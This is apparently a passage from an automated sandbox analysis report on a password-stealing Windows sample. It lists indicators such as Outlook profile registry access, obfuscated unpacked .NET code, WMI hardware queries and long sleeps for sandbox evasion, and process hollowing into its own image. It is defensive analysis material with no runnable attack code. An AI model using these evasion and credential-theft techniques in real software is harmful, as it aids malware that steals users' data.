                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, MainForm.cs.Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{EIK[0],EIK[1],"Client"}}, (string[])null, (bool[])null)
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, EZIYEA9L2ILVpWmM2J.cs.Net Code: VI2S5Cwqb6 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, EZIYEA9L2ILVpWmM2J.cs.Net Code: VI2S5Cwqb6 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, EZIYEA9L2ILVpWmM2J.cs.Net Code: VI2S5Cwqb6 System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 0_2_0812BB1D push FFFFFF8Bh; iretd 0_2_0812BB1F
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeStatic PE information: section name: .text entropy: 7.935386326287815
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, EZIYEA9L2ILVpWmM2J.csHigh entropy of concatenated method names: 'hl06tRCfAN', 'du26l2lLP3', 'jPb6QrCoW8', 'Om563hlv13', 'KPf6mGKIaP', 'npC6puPfK9', 'h966hcYvVK', 'VTB69EWZGq', 'rjU6XdKKHy', 'rnD6ngNEpG'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, fPvgG7swuttoZXeUIZ.csHigh entropy of concatenated method names: 'QbNQ8lRIC9', 'BO4QFreaop', 'XxxQ7Qnkfk', 'OU4QHurxiU', 'opaQYvhAa8', 'bRoQxmtw8u', 'nuZQvi1lQ1', 'hOLQ4UJFkb', 'zX3QTQCX1M', 'E03QyshSXd'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, ORmXg3yOriTsrTUdyW.csHigh entropy of concatenated method names: 'e5cqWsqhlI', 'aeqq6WaX8W', 'fkcqSvS6sB', 'Sglql1G9u3', 'gqlqQIAuE0', 'zDvqmFFKT3', 'aIXqpKJk3P', 'PMrLvB3USN', 'WhhL4mnIHN', 'KFZLTbJKLR'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, Ja7ioFzAH2H6C6rKgs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qBHqB6pdpG', 'qYIqEvGTYn', 'jLxqePIhUP', 'SwyqkCeGUb', 'kM8qLVhnG5', 'hInqqpl4Yt', 'Pnqq1iRD07'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, iUD8OvW6KDahnuBa1fO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'u2R18v5dDq', 'vpo1FeQvBW', 'FPG17E48X0', 'J0v1Hey0Gd', 'B401YVrFJ4', 'LEO1xYwlaB', 'mOH1vfwo8a'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, hcCjKASHGWF1cTPFpZ.csHigh entropy of concatenated method names: 'AMlWhPvgG7', 'HutW9toZXe', 'AvYWnl9CrU', 'H7nWiIsXGS', 'MaYWE8PEWu', 'r7OWeDfIaE', 'yBDnlamQWFOYyJFuxv', 'JkvDcm5EgYlleZDGNW', 'Y14WWk6viR', 'BQnW6jLE2T'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, D42KFcxIYB6xRydGN0.csHigh entropy of concatenated method names: 'Gv6k4wP3tr', 'x2MkyYUstT', 'Id1LPtOLED', 'BXNLWiVwvo', 'cdQkUdhovJ', 'ElAkRgPtxR', 'wWsk0aaHhQ', 'x82k89l0v1', 'BZkkF6FmiI', 'MAYk7v3SRq'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, rwRyIOTlnujIfaaAIE.csHigh entropy of concatenated method names: 'IPILIcvbWF', 'shwLMhWMB8', 'wxWLwDfjcE', 'OFvLVodUfx', 'ULnL8Z2BtO', 'e0iLcKqGff', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, bVPQiFDyroeRdkP8fS.csHigh entropy of concatenated method names: 'BHD5l3pl1', 'dD3O9F6Ii', 'gRC2LEmFj', 'WXGZj5R9L', 'GjRKYqD1T', 'FGoAiS0Ia', 'X638AjTlRLLUKUxtj2', 'wtdDsEDAOmoJhanfm3', 'efsLMPNal', 'nKl13fQag'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, DXGSvdA3Y6vVeGaY8P.csHigh entropy of concatenated method names: 'LT2moaoof7', 'JNGmZUkmPo', 'aJF3wlWFeA', 'vvK3VTHFa4', 'NED3cDMBKJ', 's1b3fESni9', 'GRE3jvEDcf', 'RkF3uj2m0V', 'n7B3G83bkj', 'NNg3J1yoY0'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, dvulNw4iBkaeFrSDnA.csHigh entropy of concatenated method names: 'k6JLlh2Fn5', 'mxjLQelfwK', 'fuBL32bLhu', 'syFLmubgMn', 'u1cLp8ukDO', 'zSLLhsrZII', 'ahoL9w16hx', 'FX0LXlxTfQ', 'Y0HLnE0RiW', 'l9qLid7aYl'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, BxjMHJjAaclTuYFA31.csHigh entropy of concatenated method names: 'uHEhlf61Wl', 'ifjh3FZy4g', 'yE9hp4w3Z5', 'EXppyeQypv', 'SQIpzbKu2T', 'LJJhPDS50S', 'ivqhWrf83q', 'g3WhD5rYrF', 'PZph6AsWXT', 'WgwhSfoMYd'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, sIirkVM8t1ejbhLhXr.csHigh entropy of concatenated method names: 'JQL5asNRat1uSVuU9FC', 'HJAVKbNwpvrBTdU2pYs', 'M8SeokNQqZxaF33lIo8', 'dqWpLsIG0M', 'JU0pq7CZ2Q', 'PQdp1HfUjt', 'RcwliqNsj1JMuAEx1s7', 'SIZpbwNGWfwjvMfLS1y'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, kO0PeOKvYl9CrUw7nI.csHigh entropy of concatenated method names: 'ehc3Oil0X3', 'qqx32kKU4Q', 'NGl3s4wIef', 'iQa3KuVklv', 'gAP3EKmd9O', 'uP93eWsg8Z', 'Gd33kqc71B', 'usn3LZnNZC', 'Lm53qmCXka', 'wY43117XJg'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, nj8CIy7UkDgJlnsAA8.csHigh entropy of concatenated method names: 'ToString', 'cFneUDEodN', 'EneeM1MV8i', 'lWpewNPVtG', 'IEkeVjUV9Q', 'zLnecVwVG8', 'z0SefjxQVJ', 'OXmejC7W3R', 'JTneuKcgyA', 'WtbeGaMtIY'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, FLm1IIQZ2raRLRjPmL.csHigh entropy of concatenated method names: 'Dispose', 'CMBWT69JZn', 'e7KDMHmra2', 'MwKggIqaXb', 'WSvWyulNwi', 'nkaWzeFrSD', 'ProcessDialogKey', 'lALDPwRyIO', 'fnuDWjIfaa', 'FIEDDURmXg'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, Vus40WWPY4tv91QueSt.csHigh entropy of concatenated method names: 'PSdqbmFb3T', 'kYpqaKhwwn', 'aZaq5AaKeF', 'uDbqOA8cxw', 'WUkqoL3lMV', 'Oq2q22t4lI', 'TQaqZMQftZ', 'Q26qsbdDQS', 'QryqK5a9w7', 'SydqArDAOL'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, q1OrjN3HMV0MbPAoNU.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'gY8DTwRQQO', 'VcYDy4vP4d', 'wh6DzJjdUc', 'XjH6PkHnyr', 'uXZ6WIHOMR', 'xEP6DT0dVM', 'Ebo66Py3om', 'CuCmxrZ2HRAjmtG1Hl4'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, oWuL7OIDfIaE02x2wB.csHigh entropy of concatenated method names: 'B7Fpt39LWi', 'sIppQ6pVPl', 'GWipmEJHPX', 'gPJphxfPSG', 'lJyp9XPTbV', 'DPrmYjc8k8', 'lr4mxHnUNq', 'DvymvuloGW', 'ngLm4oImh5', 'rC9mTVW4PG'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, S3PGAnG8KjmOX9EZUq.csHigh entropy of concatenated method names: 'oQghb2NscV', 'iKchatavlW', 'DKch5VX9rM', 'AT9hOmyGOT', 'fsshoWmrct', 'tO9h2pjT9N', 'mVqhZUGPvA', 'kgqhsAH1lO', 'J86hKggvhL', 'RPihArqQpp'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, nS1vfe0bkY5G2t9q20.csHigh entropy of concatenated method names: 'E1wBsKKQKb', 'kSTBKCXuwO', 'NJnBIiQQY8', 'NV3BM3LZBU', 'YX7BVCWaZj', 'fNHBcLPuYA', 'hOpBjw8Md4', 'gRTBuFwLBq', 'XxKBJS8B2v', 'AbWBUtwr8d'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, E33hcSHIxISvMgLylX.csHigh entropy of concatenated method names: 'B02knqhyui', 'i7bki4gTJs', 'ToString', 'MVVklwidUE', 'jhbkQnAS6n', 'n09k3Toycv', 'IywkmP3gRA', 'sSHkp9Wba9', 'xJVkhGi3gE', 'IhFk9ROjtW'
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe PID: 6844, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Memory allocated: 1330000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Memory allocated: 3030000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Memory allocated: 2F30000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Memory allocated: 85B0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Memory allocated: 95B0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Memory allocated: 9780000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Memory allocated: A780000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Memory allocated: 1730000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Memory allocated: 3180000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Memory allocated: 2F90000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Window / User API: threadDelayed 1187
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe TID: 2492 Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe TID: 6888 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000002.00000002.2983662902.00000000014E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Memory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
